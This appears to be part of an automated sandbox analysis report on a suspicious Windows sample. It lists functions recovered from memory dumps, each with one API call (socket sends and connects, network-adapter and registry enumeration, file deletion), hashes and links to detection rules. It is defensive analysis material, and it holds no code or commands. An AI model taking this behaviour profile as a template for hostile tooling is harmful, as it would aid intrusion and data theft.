Instruction ID: a27b97624f5da3241eb71dd5ab7143bbd180a860d3ef69f9ae3024572d01753c
Opcode Fuzzy Hash: eb5a6360be5b065e3ca35185b383d05e99b0e7527e9b57775d238af07ad6f6f7
Instruction Fuzzy Hash: D711C271504244AFEB11CF51DC84BAAFBA8EF44724F0485AAED448BA41D374A4498AB5

Function 0612225A Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 061222B9

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: a76f00559c69d37550fd0d1d8b42665c258ba769ccefb9a84497210f0913dcf9
Instruction ID: 5bbced3b13fed262aee2371ab7280356fb562e37163e09a5fe4b4c196eb93cb4
Opcode Fuzzy Hash: a76f00559c69d37550fd0d1d8b42665c258ba769ccefb9a84497210f0913dcf9
Instruction Fuzzy Hash: AA1102B1400204AFEB218F51CD40FAAFBA8EF04724F04855AEE454BA51D371E55DCBB6

Function 06125888 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 061258F5

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fe2dbc15ef96b56048f434a03eff555c08d78ce67e0aaa01dfdcda8009dde6fb
Instruction ID: a4794a1aac0b6d8c534c2c6bcd8224e3a3f4ac059bef783b87906015dcdc1686
Opcode Fuzzy Hash: fe2dbc15ef96b56048f434a03eff555c08d78ce67e0aaa01dfdcda8009dde6fb
Instruction Fuzzy Hash: 15116A714093C09FDB228F219854A62FFB4EF06220F0885DAE9C44B663D265A959DB62

Function 061241C3 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 06124231

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e91f3b19a7ca046b406599bd6825531e2e954af0efa07856038bc529e51553aa
Instruction ID: 917584a38758b7caf60434ae24843d1b8d01779a0875ea47be4f6e5a22986fb0
Opcode Fuzzy Hash: e91f3b19a7ca046b406599bd6825531e2e954af0efa07856038bc529e51553aa
Instruction Fuzzy Hash: F811D0714097809FD7228F21DC44F52FFF4EF46220F0980CAE9848F5A3D365A919CB62

Function 0174B452 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E24), ref: 0174B4BB

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fd2f92ab98ac1e9f7e916c3ce2490a03734013f1c771cdb8295ce66219cd9ad2
Instruction ID: 24c5906997246880e4e4535edf30c404aefd9df76ee542e0e142f33990fdd397
Opcode Fuzzy Hash: fd2f92ab98ac1e9f7e916c3ce2490a03734013f1c771cdb8295ce66219cd9ad2
Instruction Fuzzy Hash: 65112171104240AFE721CF59DC81BBAFBA8EF04720F04809AEE444BA81C3B4E84DCAB5

Function 06123ECE Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 06123F24

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 4f6d3cdef95a336ec6bc07576fe8f1c6c5d137cac3944f481a020b6245617a13
Instruction ID: 30bd3f92f3c58518dfa604c236ef53c935fad41d92a2a011cd088876820266ad
Opcode Fuzzy Hash: 4f6d3cdef95a336ec6bc07576fe8f1c6c5d137cac3944f481a020b6245617a13
Instruction Fuzzy Hash: 531191716042059FDB60CF55E984B62FBF8EF04710F0884AAED59CB651D375E458CB72

Function 0612161E Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06121677

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: 2f7886c33269839b207d5c86f96cd0ea8e7a0526769e83efdf7e6c8939d74af1
Instruction ID: 5d35ce76b5ede648d29ce0a2a4447f86d7c641ed9f613af486e0cebe39651300
Opcode Fuzzy Hash: 2f7886c33269839b207d5c86f96cd0ea8e7a0526769e83efdf7e6c8939d74af1
Instruction Fuzzy Hash: BB11E176504244AFE721CF01CC85FAAFBA8EF44724F08845AEE444BB51D3B5A85D8AF5

Function 0174A078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0174A0D5

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 4971091ba3677903db5be9e16ab200f482e10e168533a75ce4eeac74721d8cfc
Instruction ID: cfecc611cd05acf325f16346faf9a2a1bc7175d192cb9d68df258d48490289b7
Opcode Fuzzy Hash: 4971091ba3677903db5be9e16ab200f482e10e168533a75ce4eeac74721d8cfc
Instruction Fuzzy Hash: E5118F71549780AFDB22CF55DC44B52FFB4EF46224F08849EED858B562C375A418CB62

Function 0174A8BC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0174A918

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 4c912a229244565fce28ec4d472c1d847f7ba548ab18d8dec7b6a702ed876fb7
Instruction ID: 70ac0c4094b972c5e7ce812d7a3bef60d8d258cf7be90f3d80863960089a2689
Opcode Fuzzy Hash: 4c912a229244565fce28ec4d472c1d847f7ba548ab18d8dec7b6a702ed876fb7
Instruction Fuzzy Hash: BA116D754492849FDB12CF25DC44B92BFA4EF02220F0984DADD858F262D275A849CB62

Function 06121DE2 Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06121E38

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 05be7bed39a2e762067555c19d06661261654662124b1f792dbe20c8dd31550d
Instruction ID: 08464e394b0028c2137b36dc0a9c54d58b61842f0cfa1ea8ad81039edab10517
Opcode Fuzzy Hash: 05be7bed39a2e762067555c19d06661261654662124b1f792dbe20c8dd31550d
Instruction Fuzzy Hash: D1010471504244AFEB21CF01CC85BAAFBA8EF04624F04849AEE448BA41D374A4498AB5

Function 0174BEBA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 0174BF0D

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 6b4a7fdc51c777077b3d034436a88b48d5399f6f36744e626d90d35cf27217be
Instruction ID: 87b703dfe49bd847f8896ac0a5d31d7c1f82e0f264ebb6ce95d2882e11c4e1fd
Opcode Fuzzy Hash: 6b4a7fdc51c777077b3d034436a88b48d5399f6f36744e626d90d35cf27217be
Instruction Fuzzy Hash: 5501D271504244AFE721CF05DC84BAAFBE8EF44624F04C096EE098BB91D375E94D8AB5

Function 0612232E Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0612237A

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: f1fb635c42d92280e850f243fdbfee910fad0b272dea56522d402add07b085b2
Instruction ID: d29c27f8867a2643149e93f7b5f8892e61b12e71248e752a092999c990d7fce8
Opcode Fuzzy Hash: f1fb635c42d92280e850f243fdbfee910fad0b272dea56522d402add07b085b2
Instruction Fuzzy Hash: 3411CE31900645DFDB20CF51C944B66FBE4FF08320F0889AAEE858B622D331E528CF61

Function 06121492 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,00000E24,?,?), ref: 061214E2

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: a01fc780166d452cd19e83633ed178b16eaa5e5586493384ceaa51bb5f793b30
Instruction ID: b1c94a706466b6ebbf7f6334b09162bd01481cb12e1640b39571814bb45b4413
Opcode Fuzzy Hash: a01fc780166d452cd19e83633ed178b16eaa5e5586493384ceaa51bb5f793b30
Instruction Fuzzy Hash: 7B01B171600200ABD310DF16CC45B66FBE8FB88B20F14811AED089BB41D731F915CBE5

Function 0612409A Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E24,?,?), ref: 061240EA

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: 76cd816b5a369e125c950255e73d42cba67fe4bd41b59b913bd38eac57a54c83
Instruction ID: 01dbbde263837b505d73f5f3195a27a9dea99ea16ea4e235a407c5a311aaa59d
Opcode Fuzzy Hash: 76cd816b5a369e125c950255e73d42cba67fe4bd41b59b913bd38eac57a54c83
Instruction Fuzzy Hash: A801B171600200ABD310DF16CC45B66FBE8FB88B20F14811AED089BB41D731F915CBE5

Function 061228FA Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 0612294A

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 71cd3003c301bacea41c71e3296ff1d337be155022f13b706b4c8218624937d9
Instruction ID: 6261cb5f8d6313e387816bf02d480dc56f25f2866a3de683f9562e8d7afa35cc
Opcode Fuzzy Hash: 71cd3003c301bacea41c71e3296ff1d337be155022f13b706b4c8218624937d9
Instruction Fuzzy Hash: 1401B171600200ABD310DF16CC45B66FBE8FB88B20F14811AED089BB41D731F915CBE5

Function 06124142 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,796C6D5E,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 0612417C

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 866ed7eb35aada9ca34ba93b57aca213ee72345f4e63ef631127d5398978386b
Instruction ID: fb465091ea880bdd210209dbe03ec4cda399e61d5b13cafed1b0efc641ad9d2f
Opcode Fuzzy Hash: 866ed7eb35aada9ca34ba93b57aca213ee72345f4e63ef631127d5398978386b
Instruction Fuzzy Hash: 6601B171A042459FEB50CF65D884766FBE8EF01620F08C4AADD49CF742E775F4A8CAA1

Function 06125E06 Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 06125E51

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: cdd487f274834b947a8a5ce24fb711260c450dc67fc6195dfbe4e6116c1c0e71
Instruction ID: 80fa399b520d9e920612d9275dfeb3449bf92834938b688ddb1b929bf0b02d46
Opcode Fuzzy Hash: cdd487f274834b947a8a5ce24fb711260c450dc67fc6195dfbe4e6116c1c0e71
Instruction Fuzzy Hash: B101B175900205DFEB60DF16D985B22FBE9EF04620F08C49ADD498B752D375E428CBB2

Function 06122D22 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06122D66

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 70def93c87efaa0378daced63eff1ff323ec1d0e6a54c3c4788c4f36b4e077f3
Instruction ID: 60d7ef1ad10b438fe245669324bc1643bae30ee602b59dad02152e7a655366de
Opcode Fuzzy Hash: 70def93c87efaa0378daced63eff1ff323ec1d0e6a54c3c4788c4f36b4e077f3
Instruction Fuzzy Hash: 0901A131900644DFDB21CF51D944B66FFE0EF08720F08899AEE494B651C372E529DF62

Function 0612566A Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 061256A7

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 51a0b60fd6f9b965a4eab1cea13bcfe82eb0e743106cadcd89a21b6e68d73b34
Instruction ID: c33c73bc4f59e1817162ab719ee2857ff58e1683da9bc12419327b00371b8145
Opcode Fuzzy Hash: 51a0b60fd6f9b965a4eab1cea13bcfe82eb0e743106cadcd89a21b6e68d73b34
Instruction Fuzzy Hash: 8B01F771A002858FE760CF15D9C4762FBE4EF00620F08C0AADD498F752D371E868CEA2

Function 061202AA Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,?,?), ref: 061202FA

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a4fd2cbd261a14f18eeac710fbd6d8ef2e7dd57e705607b00bca14afc915e523
Instruction ID: d0c8949dad1983845398ba781c829278408c57168e53450ff726e926b4b71e1f
Opcode Fuzzy Hash: a4fd2cbd261a14f18eeac710fbd6d8ef2e7dd57e705607b00bca14afc915e523
Instruction Fuzzy Hash: 0D01A271600600ABD210DF16CC46B66FBE8FB88A20F14811AED489BB81D771F926CBE5

Function 06124CF2 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E24,?,?), ref: 06124D42

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 6cc0ddab4ecd3941220e61a3abc984353345eac76ebe38cd0aed7c80efbef130
Instruction ID: 1d56839b97b1fdcb4a902f78438c6a56047dfa2c594c0fe334829934ded749aa
Opcode Fuzzy Hash: 6cc0ddab4ecd3941220e61a3abc984353345eac76ebe38cd0aed7c80efbef130
Instruction Fuzzy Hash: E401A271600600ABD210DF16CC46B66FBE8FB88A20F14811AED089BB41D731F926CBE5

Function 06120542 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 06120580

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 0d3a8544810b8dd97bea88bae58d7f0101fdeafb2d01361017f332e53395961f
Instruction ID: bd2cbd87065c886a191ad68fba351c0c4bfab41c3557eae4c30ae0f7ac74684b
Opcode Fuzzy Hash: 0d3a8544810b8dd97bea88bae58d7f0101fdeafb2d01361017f332e53395961f
Instruction Fuzzy Hash: 2C01D271800604DFDB20CF51D944B61FFE0EF08320F08899AEE854B612D331E068CFA2

Function 0612037E Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 061203C9

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: d2fd87618cadd52bd6af3e80da90aa40337f926d905ba4117359aa565f7f665c
Instruction ID: 65f2f1560c05e9955ddcee9e4e54ca3551d905a8881618fb9fd757410091b98e
Opcode Fuzzy Hash: d2fd87618cadd52bd6af3e80da90aa40337f926d905ba4117359aa565f7f665c
Instruction Fuzzy Hash: 1101A271600600ABD210DF16CC46B66FBE8FB88A20F14811AED089BB41D731F926CBE5

Function 0174A772 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E24,?,?), ref: 0174A7BD

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 7854d624d5b0ebb5f4997c2eea7b9b52096c3efc9b930c0c4b36e0ad218deb03
Instruction ID: adc93e665037a7fb7cf8166f8c0ab4368dc7de1e98c9df72e7197bf60d71ac36
Opcode Fuzzy Hash: 7854d624d5b0ebb5f4997c2eea7b9b52096c3efc9b930c0c4b36e0ad218deb03
Instruction Fuzzy Hash: B801A271600600ABD210DF16CC46B66FBE8FB88A20F14811AED489BB41D731F926CBE5

Function 06126482 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 061264BD

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 58ce3fbca90f4ff75528202a3258930f141ba1eadb178fad40986f5a00504833
Instruction ID: 40ab0ea14ae32b306605035dca19781dbf20e155fb3b7b7e22c9cf1cb12ea1f0
Opcode Fuzzy Hash: 58ce3fbca90f4ff75528202a3258930f141ba1eadb178fad40986f5a00504833
Instruction Fuzzy Hash: 2F01B172900645DFDB208F55D984B66FBE4EF04220F08C49ADE854B6A1D375E469CBA1

Function 0174A09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0174A0D5

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 66f15da0bb1c06dac927769b0ea38ac5c6f19a6791ca71d8a58b48b62f6b69cd
Instruction ID: 68ba4923d069c7263b3d853d0549aa75a0a8fa59947e59ecb0fcbf57567932d7
Opcode Fuzzy Hash: 66f15da0bb1c06dac927769b0ea38ac5c6f19a6791ca71d8a58b48b62f6b69cd
Instruction Fuzzy Hash: 7501F171404244DFDB20CF55D984B61FBE0EF04320F08C4AAEE4A8BA52D371E058CB62

Function 0612655A Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,796C6D5E,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 0612658C

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: be4d2148c9237b66a263e0fa339655faeb9300194a26e72ab29697a70bbeb440
Instruction ID: 1fc1b64ab397e02c905fb4b21c3932ab88e4fa9c4c308349adebde636921fe62
Opcode Fuzzy Hash: be4d2148c9237b66a263e0fa339655faeb9300194a26e72ab29697a70bbeb440
Instruction Fuzzy Hash: 8301DB709042449FEB10CF55D984765FBE4EF00220F08C4AADE488F68AD379E458CAA2

Function 0174A8E6 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0174A918

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 797df66a24dcf41835e8a2c1e48245f4f43071f87c125101297b8d8a8e781903
Instruction ID: c62f493c8aaa684392225cba3b732ae55f32ee30a96a14f2479269f194418714
Opcode Fuzzy Hash: 797df66a24dcf41835e8a2c1e48245f4f43071f87c125101297b8d8a8e781903
Instruction Fuzzy Hash: A801FD789042449FDB10CF55D984761FBE4EF04220F08C4AADE4A8F742D379E408CBA2

Function 061258BA Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 061258F5

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6ca9b546a0e609f1c59cf974e9cb5b8393b0e745d491905ae3a15eeee6336b90
Instruction ID: 4b3a4660af0da7de3308945d1027ad8782d3d90b9382f3d18baf60e977b3986f
Opcode Fuzzy Hash: 6ca9b546a0e609f1c59cf974e9cb5b8393b0e745d491905ae3a15eeee6336b90
Instruction Fuzzy Hash: 23018F71404644DFDB608F45D984B61FBE1EF04720F08C59ADE894B651C375E469DFA2

Function 061241F6 Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 06124231

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7c2460261d00bdffa02fad959d70f83686f6fff1f4035be9874a498b6318702e
Instruction ID: fdd0d42c206edf2ac0a0425236b33cac9988a2f1f29d61dba536cf29c810bf02
Opcode Fuzzy Hash: 7c2460261d00bdffa02fad959d70f83686f6fff1f4035be9874a498b6318702e
Instruction Fuzzy Hash: 4F018F71800644DFDB20CF56E944B61FBE0EF09720F08C59ADE494B662D375E469CFA2

Function 06125526 Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 06125558

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 009a281572050b14e7088395fafac2fc73e7557f25285f0306530c62dd873e6f
Instruction ID: b72c23d1f978274d0f59fdb0ad003d64c7f5ca995f002bb110ab759ef64dbe36
Opcode Fuzzy Hash: 009a281572050b14e7088395fafac2fc73e7557f25285f0306530c62dd873e6f
Instruction Fuzzy Hash: 52F0FF70900644DFEB10CF05D984761FBE5EF04220F08C09ADE4A4B752D375E459CEA2

Function 0174A2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,796C6D5E,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 0174A30C

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: eb4dadb9e34fa7e9c2adba7cdac1c31dfe4ed26062474722a9208008c52fe62f
Instruction ID: 08c2111c6bae39de884f45050541558fcb8fd97f11da0815bc034e732849ac19
Opcode Fuzzy Hash: eb4dadb9e34fa7e9c2adba7cdac1c31dfe4ed26062474722a9208008c52fe62f
Instruction Fuzzy Hash: EDF0AF75904244DFDB20CF05D984761FBE4EF04620F08C1DADE4A4F756E3B5E459CAA2

Function 019312DC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4464001935.0000000001930000.00000040.00000020.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1930000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ff983b9c819d0604bbdb1e5d31ed54665854aec567b75a7a6e442083e1a21a5
Instruction ID: 21e46f5b474dcb811a685fa4aab8e84ff5650c3525bf85d339bd7b0fa60bb932
Opcode Fuzzy Hash: 0ff983b9c819d0604bbdb1e5d31ed54665854aec567b75a7a6e442083e1a21a5
Instruction Fuzzy Hash: 0F11DF302042849FD715CB54C980B26BBA9EBC9709F28C9ACE94D4BB62C73BD807CA51

Function 060F2AB5 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4513411058.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_60f0000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71ff22323cd148e9bbb860028a6d839c459e74a8803f4337b2f184369f0de6a9
